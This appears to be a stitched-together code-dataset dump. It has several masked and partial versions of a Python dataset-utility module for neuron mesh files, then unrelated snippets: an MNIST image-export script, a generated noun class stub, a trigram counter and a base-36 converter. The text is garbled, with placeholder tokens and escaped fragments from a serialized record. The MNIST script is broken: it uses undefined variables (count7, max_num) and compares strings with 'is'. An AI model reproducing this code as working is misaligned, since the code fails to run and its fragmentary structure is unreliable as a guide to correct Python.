Searches a directory for a set of extensions and returns the files\n matching those extensions, sorted by basename\n \"\"\"\n filenames = list()\n for ext in exts:\n ext_expr = os.path.join(dirname, f'*.{ext}')\n filenames.extend(glob.glob(ext_expr))\n return sorted(filenames, key=os.path.basename)\n\n\ndef split_files(filenames, train_split=0.8, val_split=0.1, test_split=0.1,\n seed=None):\n if seed is not None:\n random.seed(seed)\n total = train_split + val_split + test_split\n train_split = train_split / total\n val_split = val_split / total\n test_split = test_split / total\n n_train = round(train_split * len(filenames))\n n_val = round(val_split * len(filenames))\n permutation = random.sample(filenames, len(filenames))\n train_files = permutation[:n_train]\n val_files = permutation[n_train:n_train + n_val]\n test_files = permutation[n_train + n_val:]\n return train_files, val_files, test_files\n\n\n<mask token>\n\n\ndef save_samples(samples, output_prefix='sample'):\n \"\"\"Saves a list of samples to ply files (with h5 labels)\"\"\"\n for i, vertices in enumerate(samples):\n vertex_fname = '{pref}{i}_vertices.ply'.format(pref=output_prefix, i=i)\n if os.path.dirname(vertex_fname) == '':\n vertex_fname = './' + vertex_fname\n mesh_io.Mesh.write_vertices_ply(None, vertex_fname, coords=vertices)\n", "step-3": "__doc__ = \"\"\"\nDataset Module Utilities - mostly for handling files and datasets\n\"\"\"\n<mask token>\nSVEN_BASE = 'seungmount/research/svenmd'\nNICK_BASE = 'seungmount/research/Nick/'\nBOTH_BASE = 'seungmount/research/nick_and_sven'\nDATASET_DIRS = {'orig_full_cells': [\n f'{SVEN_BASE}/pointnet_axoness_gt_180223/'], 'soma_vs_rest': [\n f'{SVEN_BASE}/pointnet_soma_masked_180401'], 'orphans': [\n f'{SVEN_BASE}/pointnet_orphan_axons_gt_180308/',\n f'{SVEN_BASE}/pointnet_orphan_dendrites_gt_180308/'], 'orphans2': [\n f'{NICK_BASE}/pointnet/orphan_dataset/train_val_axons',\n f'{NICK_BASE}/pointnet/orphan_dataset/train_val_dends/'],\n 'orphan_axons': 
[f'{SVEN_BASE}/pointnet_orphan_axons_gt_180308/'],\n 'orphan_axons_refined': [\n f'{SVEN_BASE}/pointnet_orphan_axons_gt_180308_refined/'],\n 'pinky100_orphan_dends': [f'{BOTH_BASE}/data/180920_orphan_dends/'],\n 'orphan_axons_pinky100': [f'{SVEN_BASE}/InhAnalysis/meshes_put_axon/'],\n 'fish_refined': [f'{SVEN_BASE}/180831_meshes_ashwin_refined/'],\n 'full_cells_unrefined': [\n f'{SVEN_BASE}/pointnet_full_semantic_labels_masked_180401'],\n 'full_cells_refined': [\n f'{SVEN_BASE}/pointnet_full_semantic_labels_masked_180401_refined/'],\n 'pinky100_orphan_dend_features': [\n f'{BOTH_BASE}/nick_archive/p100_dend_outer/inference/proj32/'],\n 'pinky100_orphan_dend_features_32': [\n f'{BOTH_BASE}/nick_archive/p100_dend_outer_32/inference/'], 'default':\n [f'{SVEN_BASE}/pointnet_axoness_gt_rfc_based_masked_180322/',\n f'{SVEN_BASE}/pointnet_orphan_axons_gt_180308/',\n f'{SVEN_BASE}/pointnet_orphan_dendrites_gt_180308/']}\n\n\ndef fetch_dset_dirs(dset_name=None):\n \"\"\"\n Finds the global pathname to a list of directories which represent a\n dataset by name.\n \"\"\"\n assert dset_name is None or dset_name in DATASET_DIRS, 'invalid name'\n dset_name = 'default' if dset_name is None else dset_name\n home = os.path.expanduser('~')\n return list(os.path.join(home, d) for d in DATASET_DIRS[dset_name])\n\n\ndef files_from_dir(dirname, exts=['obj', 'h5']):\n \"\"\"\n Searches a directory for a set of extensions and returns the files\n matching those extensions, sorted by basename\n \"\"\"\n filenames = list()\n for ext in exts:\n ext_expr = os.path.join(dirname, f'*.{ext}')\n filenames.extend(glob.glob(ext_expr))\n return sorted(filenames, key=os.path.basename)\n\n\ndef split_files(filenames, train_split=0.8, val_split=0.1, test_split=0.1,\n seed=None):\n if seed is not None:\n random.seed(seed)\n total = train_split + val_split + test_split\n train_split = train_split / total\n val_split = val_split / total\n test_split = test_split / total\n n_train = round(train_split * 
len(filenames))\n n_val = round(val_split * len(filenames))\n permutation = random.sample(filenames, len(filenames))\n train_files = permutation[:n_train]\n val_files = permutation[n_train:n_train + n_val]\n test_files = permutation[n_train + n_val:]\n return train_files, val_files, test_files\n\n\ndef pull_n_samples(dset, n):\n \"\"\"Pulls n random samples from a dataset object\"\"\"\n return list(dset[i] for i in random.sample(range(len(dset)), n))\n\n\ndef save_samples(samples, output_prefix='sample'):\n \"\"\"Saves a list of samples to ply files (with h5 labels)\"\"\"\n for i, vertices in enumerate(samples):\n vertex_fname = '{pref}{i}_vertices.ply'.format(pref=output_prefix, i=i)\n if os.path.dirname(vertex_fname) == '':\n vertex_fname = './' + vertex_fname\n mesh_io.Mesh.write_vertices_ply(None, vertex_fname, coords=vertices)\n", "step-4": "__doc__ = \"\"\"\nDataset Module Utilities - mostly for handling files and datasets\n\"\"\"\nimport glob\nimport os\nimport random\nfrom meshparty import mesh_io\nSVEN_BASE = 'seungmount/research/svenmd'\nNICK_BASE = 'seungmount/research/Nick/'\nBOTH_BASE = 'seungmount/research/nick_and_sven'\nDATASET_DIRS = {'orig_full_cells': [\n f'{SVEN_BASE}/pointnet_axoness_gt_180223/'], 'soma_vs_rest': [\n f'{SVEN_BASE}/pointnet_soma_masked_180401'], 'orphans': [\n f'{SVEN_BASE}/pointnet_orphan_axons_gt_180308/',\n f'{SVEN_BASE}/pointnet_orphan_dendrites_gt_180308/'], 'orphans2': [\n f'{NICK_BASE}/pointnet/orphan_dataset/train_val_axons',\n f'{NICK_BASE}/pointnet/orphan_dataset/train_val_dends/'],\n 'orphan_axons': [f'{SVEN_BASE}/pointnet_orphan_axons_gt_180308/'],\n 'orphan_axons_refined': [\n f'{SVEN_BASE}/pointnet_orphan_axons_gt_180308_refined/'],\n 'pinky100_orphan_dends': [f'{BOTH_BASE}/data/180920_orphan_dends/'],\n 'orphan_axons_pinky100': [f'{SVEN_BASE}/InhAnalysis/meshes_put_axon/'],\n 'fish_refined': [f'{SVEN_BASE}/180831_meshes_ashwin_refined/'],\n 'full_cells_unrefined': [\n 
f'{SVEN_BASE}/pointnet_full_semantic_labels_masked_180401'],\n 'full_cells_refined': [\n f'{SVEN_BASE}/pointnet_full_semantic_labels_masked_180401_refined/'],\n 'pinky100_orphan_dend_features': [\n f'{BOTH_BASE}/nick_archive/p100_dend_outer/inference/proj32/'],\n 'pinky100_orphan_dend_features_32': [\n f'{BOTH_BASE}/nick_archive/p100_dend_outer_32/inference/'], 'default':\n [f'{SVEN_BASE}/pointnet_axoness_gt_rfc_based_masked_180322/',\n f'{SVEN_BASE}/pointnet_orphan_axons_gt_180308/',\n f'{SVEN_BASE}/pointnet_orphan_dendrites_gt_180308/']}\n\n\ndef fetch_dset_dirs(dset_name=None):\n \"\"\"\n Finds the global pathname to a list of directories which represent a\n dataset by name.\n \"\"\"\n assert dset_name is None or dset_name in DATASET_DIRS, 'invalid name'\n dset_name = 'default' if dset_name is None else dset_name\n home = os.path.expanduser('~')\n return list(os.path.join(home, d) for d in DATASET_DIRS[dset_name])\n\n\ndef files_from_dir(dirname, exts=['obj', 'h5']):\n \"\"\"\n Searches a directory for a set of extensions and returns the files\n matching those extensions, sorted by basename\n \"\"\"\n filenames = list()\n for ext in exts:\n ext_expr = os.path.join(dirname, f'*.{ext}')\n filenames.extend(glob.glob(ext_expr))\n return sorted(filenames, key=os.path.basename)\n\n\ndef split_files(filenames, train_split=0.8, val_split=0.1, test_split=0.1,\n seed=None):\n if seed is not None:\n random.seed(seed)\n total = train_split + val_split + test_split\n train_split = train_split / total\n val_split = val_split / total\n test_split = test_split / total\n n_train = round(train_split * len(filenames))\n n_val = round(val_split * len(filenames))\n permutation = random.sample(filenames, len(filenames))\n train_files = permutation[:n_train]\n val_files = permutation[n_train:n_train + n_val]\n test_files = permutation[n_train + n_val:]\n return train_files, val_files, test_files\n\n\ndef pull_n_samples(dset, n):\n \"\"\"Pulls n random samples from a dataset 
object\"\"\"\n return list(dset[i] for i in random.sample(range(len(dset)), n))\n\n\ndef save_samples(samples, output_prefix='sample'):\n \"\"\"Saves a list of samples to ply files (with h5 labels)\"\"\"\n for i, vertices in enumerate(samples):\n vertex_fname = '{pref}{i}_vertices.ply'.format(pref=output_prefix, i=i)\n if os.path.dirname(vertex_fname) == '':\n vertex_fname = './' + vertex_fname\n mesh_io.Mesh.write_vertices_ply(None, vertex_fname, coords=vertices)\n", "step-5": "__doc__ = \"\"\"\nDataset Module Utilities - mostly for handling files and datasets\n\"\"\"\nimport glob\nimport os\nimport random\n\nfrom meshparty import mesh_io\n\n\n# Datasets -----------------------\nSVEN_BASE = \"seungmount/research/svenmd\"\nNICK_BASE = \"seungmount/research/Nick/\"\nBOTH_BASE = \"seungmount/research/nick_and_sven\"\nDATASET_DIRS = {\n \"orig_full_cells\": [f\"{SVEN_BASE}/pointnet_axoness_gt_180223/\"],\n\n \"soma_vs_rest\": [f\"{SVEN_BASE}/pointnet_soma_masked_180401\"],\n\n \"orphans\": [f\"{SVEN_BASE}/pointnet_orphan_axons_gt_180308/\",\n f\"{SVEN_BASE}/pointnet_orphan_dendrites_gt_180308/\"],\n\n \"orphans2\": [f\"{NICK_BASE}/pointnet/orphan_dataset/train_val_axons\",\n f\"{NICK_BASE}/pointnet/orphan_dataset/train_val_dends/\"],\n\n \"orphan_axons\": [f\"{SVEN_BASE}/pointnet_orphan_axons_gt_180308/\"],\n\n \"orphan_axons_refined\": [(f\"{SVEN_BASE}\"\n \"/pointnet_orphan_axons_gt_180308_refined/\")],\n\n \"pinky100_orphan_dends\": [(f\"{BOTH_BASE}/data/180920_orphan_dends/\")],\n\n \"orphan_axons_pinky100\": [(f\"{SVEN_BASE}/InhAnalysis/meshes_put_axon/\")],\n\n \"fish_refined\": [f\"{SVEN_BASE}/180831_meshes_ashwin_refined/\"],\n\n \"full_cells_unrefined\": [(f\"{SVEN_BASE}\"\n \"/pointnet_full_semantic_labels\"\n \"_masked_180401\")],\n\n \"full_cells_refined\": [(f\"{SVEN_BASE}\"\n \"/pointnet_full_semantic_labels\"\n \"_masked_180401_refined/\")],\n\n \"pinky100_orphan_dend_features\": [(f\"{BOTH_BASE}\"\n \"/nick_archive/p100_dend_outer\"\n 
\"/inference/proj32/\")],\n\n \"pinky100_orphan_dend_features_32\": [(f\"{BOTH_BASE}\"\n \"/nick_archive/p100_dend_outer_32\"\n \"/inference/\")],\n\n \"default\": [f\"{SVEN_BASE}/pointnet_axoness_gt_rfc_based_masked_180322/\",\n f\"{SVEN_BASE}/pointnet_orphan_axons_gt_180308/\",\n f\"{SVEN_BASE}/pointnet_orphan_dendrites_gt_180308/\"]\n}\n# --------------------------------\n\n\ndef fetch_dset_dirs(dset_name=None):\n \"\"\"\n Finds the global pathname to a list of directories which represent a\n dataset by name.\n \"\"\"\n assert (dset_name is None) or (dset_name in DATASET_DIRS), \"invalid name\"\n\n dset_name = \"default\" if dset_name is None else dset_name\n\n home = os.path.expanduser(\"~\")\n\n return list(os.path.join(home, d) for d in DATASET_DIRS[dset_name])\n\n\ndef files_from_dir(dirname, exts=[\"obj\", \"h5\"]):\n \"\"\"\n Searches a directory for a set of extensions and returns the files\n matching those extensions, sorted by basename\n \"\"\"\n filenames = list()\n for ext in exts:\n ext_expr = os.path.join(dirname, f\"*.{ext}\")\n filenames.extend(glob.glob(ext_expr))\n\n return sorted(filenames, key=os.path.basename)\n\n\ndef split_files(filenames, train_split=0.8,\n val_split=0.1, test_split=0.1, seed=None):\n\n if seed is not None:\n random.seed(seed)\n\n # Normalizing splits for arbitrary values\n total = train_split + val_split + test_split\n\n train_split = train_split / total\n val_split = val_split / total\n test_split = test_split / total\n\n n_train = round(train_split * len(filenames))\n n_val = round(val_split * len(filenames))\n\n permutation = random.sample(filenames, len(filenames))\n\n train_files = permutation[:n_train]\n val_files = permutation[n_train:(n_train+n_val)]\n test_files = permutation[(n_train+n_val):]\n\n return train_files, val_files, test_files\n\n\n# Helper functions for testing (e.g. 
sample.py)\ndef pull_n_samples(dset, n):\n \"\"\"Pulls n random samples from a dataset object\"\"\"\n return list(dset[i] for i in random.sample(range(len(dset)), n))\n\n\ndef save_samples(samples, output_prefix=\"sample\"):\n \"\"\"Saves a list of samples to ply files (with h5 labels)\"\"\"\n\n for (i, vertices) in enumerate(samples):\n vertex_fname = \"{pref}{i}_vertices.ply\".format(pref=output_prefix, i=i)\n if os.path.dirname(vertex_fname) == \"\":\n vertex_fname = \"./\" + vertex_fname\n mesh_io.Mesh.write_vertices_ply(None, vertex_fname, coords=vertices)\n", "step-ids": [ 3, 4, 6, 7, 8 ] }
[ 3, 4, 6, 7, 8 ]
import os import urllib.request import zipfile import tarfile import matplotlib.pyplot as plt %matplotlib inline from PIL import Image import numpy as np # フォルダ「data」が存在しない場合は作成する data_dir = "./data/" if not os.path.exists(data_dir): os.mkdir(data_dir) # MNIStをダウンロードして読み込む from sklearn.datasets import fetch_openml mnist = fetch_openml("mnist_784", version = 1, data_home = "./data") data_dir_path = "./data/img_78/" if not os.path.exists(data_dir_path): os.mkdir(data_dir_path) # MNIST1から数字の7, 8の画像だけフォルダ img_78に保存するよ count_7 = 0 count_8 = 0 N = 200 # 200枚ずつ作成 X = mnist.data y = mnist.target for i in range(len(X)): # generate image of 7 if (y[i] is "7") and (count_7 < N): file_path = "./data/img_78/img_7_" + str(count_7) + ".jpg" im_f = (X[i].reshape(28, 28)) pil_img_f = Image.fromarray(im_f.astype(np.uint8)) # 画像をPILに pil_img_f = pil_img_f.resize((64, 64), Image.BICUBIC) # 64×64に拡大 pil_img_f.save(file_path) # 保存 count7+=1 # 画像8の作成 if (y[i] is "8") and (count8<max_num): file_path="./data/img_78/img_8_"+str(count_8)+".jpg" im_f=(X[i].reshape(28, 28)) # 画像を28*28の形に変形 pil_img_f = Image.fromarray(im_f.astype(np.uint8)) # 画像をPILに pil_img_f = pil_img_f.resize((64, 64), Image.BICUBIC) # 64×64に拡大 pil_img_f.save(file_path) # 保存 count8+=1
normal
{ "blob_id": "6f53a989ddf179b699186a78b5d8cf6d3d08cbb2", "index": 4756, "step-1": "import os\nimport urllib.request\nimport zipfile\nimport tarfile\n\nimport matplotlib.pyplot as plt\n%matplotlib inline\nfrom PIL import Image\nimport numpy as np\n\n# フォルダ「data」が存在しない場合は作成する\ndata_dir = \"./data/\"\nif not os.path.exists(data_dir):\n os.mkdir(data_dir)\n\n# MNIStをダウンロードして読み込む\nfrom sklearn.datasets import fetch_openml\nmnist = fetch_openml(\"mnist_784\", version = 1, data_home = \"./data\")\n\ndata_dir_path = \"./data/img_78/\"\nif not os.path.exists(data_dir_path):\n os.mkdir(data_dir_path)\n\n# MNIST1から数字の7, 8の画像だけフォルダ img_78に保存するよ\n\ncount_7 = 0\ncount_8 = 0\nN = 200 # 200枚ずつ作成\n\nX = mnist.data\ny = mnist.target\n\n\nfor i in range(len(X)):\n\n # generate image of 7\n if (y[i] is \"7\") and (count_7 < N):\n file_path = \"./data/img_78/img_7_\" + str(count_7) + \".jpg\"\n im_f = (X[i].reshape(28, 28))\n pil_img_f = Image.fromarray(im_f.astype(np.uint8)) # 画像をPILに\n pil_img_f = pil_img_f.resize((64, 64), Image.BICUBIC) # 64×64に拡大\n pil_img_f.save(file_path) # 保存\n count7+=1 \n \n # 画像8の作成\n if (y[i] is \"8\") and (count8<max_num):\n file_path=\"./data/img_78/img_8_\"+str(count_8)+\".jpg\"\n im_f=(X[i].reshape(28, 28)) # 画像を28*28の形に変形\n pil_img_f = Image.fromarray(im_f.astype(np.uint8)) # 画像をPILに\n pil_img_f = pil_img_f.resize((64, 64), Image.BICUBIC) # 64×64に拡大\n pil_img_f.save(file_path) # 保存\n count8+=1 ", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
from xai.brain.wordbase.nouns._teleconference import _TELECONFERENCE #calss header class _TELECONFERENCES(_TELECONFERENCE, ): def __init__(self,): _TELECONFERENCE.__init__(self) self.name = "TELECONFERENCES" self.specie = 'nouns' self.basic = "teleconference" self.jsondata = {}
normal
{ "blob_id": "9021fa440561461ee179f333aa04a155d06c6e86", "index": 7255, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass _TELECONFERENCES(_TELECONFERENCE):\n <mask token>\n", "step-3": "<mask token>\n\n\nclass _TELECONFERENCES(_TELECONFERENCE):\n\n def __init__(self):\n _TELECONFERENCE.__init__(self)\n self.name = 'TELECONFERENCES'\n self.specie = 'nouns'\n self.basic = 'teleconference'\n self.jsondata = {}\n", "step-4": "from xai.brain.wordbase.nouns._teleconference import _TELECONFERENCE\n\n\nclass _TELECONFERENCES(_TELECONFERENCE):\n\n def __init__(self):\n _TELECONFERENCE.__init__(self)\n self.name = 'TELECONFERENCES'\n self.specie = 'nouns'\n self.basic = 'teleconference'\n self.jsondata = {}\n", "step-5": "\n\nfrom xai.brain.wordbase.nouns._teleconference import _TELECONFERENCE\n\n#calss header\nclass _TELECONFERENCES(_TELECONFERENCE, ):\n\tdef __init__(self,): \n\t\t_TELECONFERENCE.__init__(self)\n\t\tself.name = \"TELECONFERENCES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"teleconference\"\n\t\tself.jsondata = {}\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> def count_or_add_trigrams(trigram, trigrams_so_far): """ Takes a trigram, and a list of previously seen trigrams and yields the same list with all discovered and counted trigrams. Adds given trigram if not found, increments the trigram counter if found. """ for entry in trigrams_so_far: test_trigram = entry[0] if test_trigram == trigram: entry[1] += 1 break else: trigrams_so_far.append([trigram, 1]) return trigrams_so_far <|reserved_special_token_0|> for trigram in test_trigrams: print('I have been given this trigram:', end=' ') pprint(trigram) trigram_count = count_or_add_trigrams(trigram, trigram_count) print('After finishing this operation, my data looks like:') pprint(trigram_count) print('-------------------------------------------------------------') print('After doing all test trigrams, this is what I have:') pprint(trigram_count) <|reserved_special_token_1|> <|reserved_special_token_0|> def count_or_add_trigrams(trigram, trigrams_so_far): """ Takes a trigram, and a list of previously seen trigrams and yields the same list with all discovered and counted trigrams. Adds given trigram if not found, increments the trigram counter if found. 
""" for entry in trigrams_so_far: test_trigram = entry[0] if test_trigram == trigram: entry[1] += 1 break else: trigrams_so_far.append([trigram, 1]) return trigrams_so_far test_trigrams = [['a', 'b', 'c'], ['d', 'e', 'f'], ['b', 'd', 'e'], ['d', 'e', 'f'], ['a', 'a', 'a'], ['d', 'e', 'f']] trigram_count = [] for trigram in test_trigrams: print('I have been given this trigram:', end=' ') pprint(trigram) trigram_count = count_or_add_trigrams(trigram, trigram_count) print('After finishing this operation, my data looks like:') pprint(trigram_count) print('-------------------------------------------------------------') print('After doing all test trigrams, this is what I have:') pprint(trigram_count) <|reserved_special_token_1|> from pprint import pprint def count_or_add_trigrams(trigram, trigrams_so_far): """ Takes a trigram, and a list of previously seen trigrams and yields the same list with all discovered and counted trigrams. Adds given trigram if not found, increments the trigram counter if found. """ for entry in trigrams_so_far: test_trigram = entry[0] if test_trigram == trigram: entry[1] += 1 break else: trigrams_so_far.append([trigram, 1]) return trigrams_so_far test_trigrams = [['a', 'b', 'c'], ['d', 'e', 'f'], ['b', 'd', 'e'], ['d', 'e', 'f'], ['a', 'a', 'a'], ['d', 'e', 'f']] trigram_count = [] for trigram in test_trigrams: print('I have been given this trigram:', end=' ') pprint(trigram) trigram_count = count_or_add_trigrams(trigram, trigram_count) print('After finishing this operation, my data looks like:') pprint(trigram_count) print('-------------------------------------------------------------') print('After doing all test trigrams, this is what I have:') pprint(trigram_count) <|reserved_special_token_1|> # Head start. 
# ask me for this solution: 6cb9ce6024b5fd41aebb86ccd40d8080 # this line is not needed, just for better output: from pprint import pprint # just remove the top line def count_or_add_trigrams(trigram, trigrams_so_far): ''' Takes a trigram, and a list of previously seen trigrams and yields the same list with all discovered and counted trigrams. Adds given trigram if not found, increments the trigram counter if found. ''' for entry in trigrams_so_far: test_trigram = entry[0] if test_trigram == trigram: entry[1] += 1 break else: trigrams_so_far.append([trigram, 1]) return trigrams_so_far test_trigrams = [ ['a', 'b', 'c'], ['d', 'e', 'f'], ['b', 'd', 'e'], ['d', 'e', 'f'], ['a', 'a', 'a'], ['d', 'e', 'f'] ] trigram_count = [] for trigram in test_trigrams: print('I have been given this trigram:', end=' ') pprint(trigram) trigram_count = count_or_add_trigrams(trigram, trigram_count) print('After finishing this operation, my data looks like:') pprint(trigram_count) print('-------------------------------------------------------------') print('After doing all test trigrams, this is what I have:') pprint(trigram_count)
flexible
{ "blob_id": "753cc532e4d049bacff33c97de4d80bb9ab8ece8", "index": 2655, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef count_or_add_trigrams(trigram, trigrams_so_far):\n \"\"\"\n Takes a trigram, and a list of previously seen trigrams\n and yields the same list with all discovered and counted\n trigrams.\n Adds given trigram if not found,\n increments the trigram counter if found.\n \"\"\"\n for entry in trigrams_so_far:\n test_trigram = entry[0]\n if test_trigram == trigram:\n entry[1] += 1\n break\n else:\n trigrams_so_far.append([trigram, 1])\n return trigrams_so_far\n\n\n<mask token>\nfor trigram in test_trigrams:\n print('I have been given this trigram:', end=' ')\n pprint(trigram)\n trigram_count = count_or_add_trigrams(trigram, trigram_count)\n print('After finishing this operation, my data looks like:')\n pprint(trigram_count)\n print('-------------------------------------------------------------')\nprint('After doing all test trigrams, this is what I have:')\npprint(trigram_count)\n", "step-3": "<mask token>\n\n\ndef count_or_add_trigrams(trigram, trigrams_so_far):\n \"\"\"\n Takes a trigram, and a list of previously seen trigrams\n and yields the same list with all discovered and counted\n trigrams.\n Adds given trigram if not found,\n increments the trigram counter if found.\n \"\"\"\n for entry in trigrams_so_far:\n test_trigram = entry[0]\n if test_trigram == trigram:\n entry[1] += 1\n break\n else:\n trigrams_so_far.append([trigram, 1])\n return trigrams_so_far\n\n\ntest_trigrams = [['a', 'b', 'c'], ['d', 'e', 'f'], ['b', 'd', 'e'], ['d',\n 'e', 'f'], ['a', 'a', 'a'], ['d', 'e', 'f']]\ntrigram_count = []\nfor trigram in test_trigrams:\n print('I have been given this trigram:', end=' ')\n pprint(trigram)\n trigram_count = count_or_add_trigrams(trigram, trigram_count)\n print('After finishing this operation, my data looks like:')\n pprint(trigram_count)\n print('-------------------------------------------------------------')\nprint('After 
doing all test trigrams, this is what I have:')\npprint(trigram_count)\n", "step-4": "from pprint import pprint\n\n\ndef count_or_add_trigrams(trigram, trigrams_so_far):\n \"\"\"\n Takes a trigram, and a list of previously seen trigrams\n and yields the same list with all discovered and counted\n trigrams.\n Adds given trigram if not found,\n increments the trigram counter if found.\n \"\"\"\n for entry in trigrams_so_far:\n test_trigram = entry[0]\n if test_trigram == trigram:\n entry[1] += 1\n break\n else:\n trigrams_so_far.append([trigram, 1])\n return trigrams_so_far\n\n\ntest_trigrams = [['a', 'b', 'c'], ['d', 'e', 'f'], ['b', 'd', 'e'], ['d',\n 'e', 'f'], ['a', 'a', 'a'], ['d', 'e', 'f']]\ntrigram_count = []\nfor trigram in test_trigrams:\n print('I have been given this trigram:', end=' ')\n pprint(trigram)\n trigram_count = count_or_add_trigrams(trigram, trigram_count)\n print('After finishing this operation, my data looks like:')\n pprint(trigram_count)\n print('-------------------------------------------------------------')\nprint('After doing all test trigrams, this is what I have:')\npprint(trigram_count)\n", "step-5": "# Head start.\r\n# ask me for this solution: 6cb9ce6024b5fd41aebb86ccd40d8080\r\n\r\n# this line is not needed, just for better output:\r\nfrom pprint import pprint\r\n# just remove the top line\r\n\r\ndef count_or_add_trigrams(trigram, trigrams_so_far):\r\n '''\r\n Takes a trigram, and a list of previously seen trigrams\r\n and yields the same list with all discovered and counted\r\n trigrams.\r\n Adds given trigram if not found,\r\n increments the trigram counter if found.\r\n '''\r\n\r\n for entry in trigrams_so_far:\r\n test_trigram = entry[0]\r\n if test_trigram == trigram:\r\n entry[1] += 1\r\n\r\n break\r\n\r\n else:\r\n trigrams_so_far.append([trigram, 1])\r\n return trigrams_so_far\r\n\r\n\r\ntest_trigrams = [\r\n ['a', 'b', 'c'],\r\n ['d', 'e', 'f'],\r\n ['b', 'd', 'e'],\r\n ['d', 'e', 'f'],\r\n ['a', 'a', 'a'],\r\n ['d', 'e', 
'f']\r\n]\r\n\r\ntrigram_count = []\r\nfor trigram in test_trigrams:\r\n print('I have been given this trigram:', end=' ')\r\n pprint(trigram)\r\n trigram_count = count_or_add_trigrams(trigram, trigram_count)\r\n print('After finishing this operation, my data looks like:')\r\n pprint(trigram_count)\r\n print('-------------------------------------------------------------')\r\n\r\nprint('After doing all test trigrams, this is what I have:')\r\npprint(trigram_count)\r\n", "step-ids": [ 0, 2, 3, 4, 5 ] }
[ 0, 2, 3, 4, 5 ]
<|reserved_special_token_0|> def enter_num(): """ get user input and do error checking for illegal digits. returns ------- num """ num = input('please enter a BASE 36 number, e.g. A36Z :> ') num = num.upper() for digit in num: digit = digit.upper() if digit not in WORD: print(' **error** user input failed\n') print('do you want to re enter number') ans = input('y or n ') ans = ans.upper() if ans == 'Y': num = enter_num() else: num = None return num def mk_num_lst(num): """ make BASE 36 number from user into a list. reverse list so digit are read left to right. returns ------- num_lst """ num_lst = [] for digit in num: num_lst.append(digit) num_lst.reverse() return num_lst <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> def enter_num(): """ get user input and do error checking for illegal digits. returns ------- num """ num = input('please enter a BASE 36 number, e.g. A36Z :> ') num = num.upper() for digit in num: digit = digit.upper() if digit not in WORD: print(' **error** user input failed\n') print('do you want to re enter number') ans = input('y or n ') ans = ans.upper() if ans == 'Y': num = enter_num() else: num = None return num def mk_num_lst(num): """ make BASE 36 number from user into a list. reverse list so digit are read left to right. returns ------- num_lst """ num_lst = [] for digit in num: num_lst.append(digit) num_lst.reverse() return num_lst def convert(num_lst): """ convert each digit to power of 36 appropriately. prints result in decimal. returns ------- dec """ dec = 0 for i in range(0, len(num_lst)): print('position right to left is >', i + 1, 'value is ', BASE[ num_lst[i]], 'decimal value is', 36 ** i * BASE[num_lst[i]]) dec += 36 ** i * BASE[num_lst[i]] return dec def main(): """ process valid user input or terminate program on failed input. 
""" num = enter_num() if num is not None: num_lst = mk_num_lst(num) dec = convert(num_lst) print('decimal value of BASE 36 number', num, 'is', dec) else: print('user terminated program') <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> for i, item in enumerate(WORD): BASE.update({WORD[i]: i}) def enter_num(): """ get user input and do error checking for illegal digits. returns ------- num """ num = input('please enter a BASE 36 number, e.g. A36Z :> ') num = num.upper() for digit in num: digit = digit.upper() if digit not in WORD: print(' **error** user input failed\n') print('do you want to re enter number') ans = input('y or n ') ans = ans.upper() if ans == 'Y': num = enter_num() else: num = None return num def mk_num_lst(num): """ make BASE 36 number from user into a list. reverse list so digit are read left to right. returns ------- num_lst """ num_lst = [] for digit in num: num_lst.append(digit) num_lst.reverse() return num_lst def convert(num_lst): """ convert each digit to power of 36 appropriately. prints result in decimal. returns ------- dec """ dec = 0 for i in range(0, len(num_lst)): print('position right to left is >', i + 1, 'value is ', BASE[ num_lst[i]], 'decimal value is', 36 ** i * BASE[num_lst[i]]) dec += 36 ** i * BASE[num_lst[i]] return dec def main(): """ process valid user input or terminate program on failed input. """ num = enter_num() if num is not None: num_lst = mk_num_lst(num) dec = convert(num_lst) print('decimal value of BASE 36 number', num, 'is', dec) else: print('user terminated program') main() <|reserved_special_token_1|> <|reserved_special_token_0|> WORD = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ' BASE = {} for i, item in enumerate(WORD): BASE.update({WORD[i]: i}) def enter_num(): """ get user input and do error checking for illegal digits. returns ------- num """ num = input('please enter a BASE 36 number, e.g. 
A36Z :> ') num = num.upper() for digit in num: digit = digit.upper() if digit not in WORD: print(' **error** user input failed\n') print('do you want to re enter number') ans = input('y or n ') ans = ans.upper() if ans == 'Y': num = enter_num() else: num = None return num def mk_num_lst(num): """ make BASE 36 number from user into a list. reverse list so digit are read left to right. returns ------- num_lst """ num_lst = [] for digit in num: num_lst.append(digit) num_lst.reverse() return num_lst def convert(num_lst): """ convert each digit to power of 36 appropriately. prints result in decimal. returns ------- dec """ dec = 0 for i in range(0, len(num_lst)): print('position right to left is >', i + 1, 'value is ', BASE[ num_lst[i]], 'decimal value is', 36 ** i * BASE[num_lst[i]]) dec += 36 ** i * BASE[num_lst[i]] return dec def main(): """ process valid user input or terminate program on failed input. """ num = enter_num() if num is not None: num_lst = mk_num_lst(num) dec = convert(num_lst) print('decimal value of BASE 36 number', num, 'is', dec) else: print('user terminated program') main() <|reserved_special_token_1|> # -*- coding: utf-8 -*- """ Created on Wed Dec 19 09:41:08 2018 hexatrigesimal to decimal calculator, base 36 encoding; use of letters with digits. @author: susan """ ## create a dictionary as reference for BASE 36 calculations WORD = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ" # digits of BASE 36 BASE = {} for i, item in enumerate(WORD): # iterate through word BASE.update({WORD[i]:i}) # update BASE dictionary with key:value pair # input function, BASE 36 numbers for calculations. def enter_num(): """ get user input and do error checking for illegal digits. returns ------- num """ num = input("please enter a BASE 36 number, e.g. 
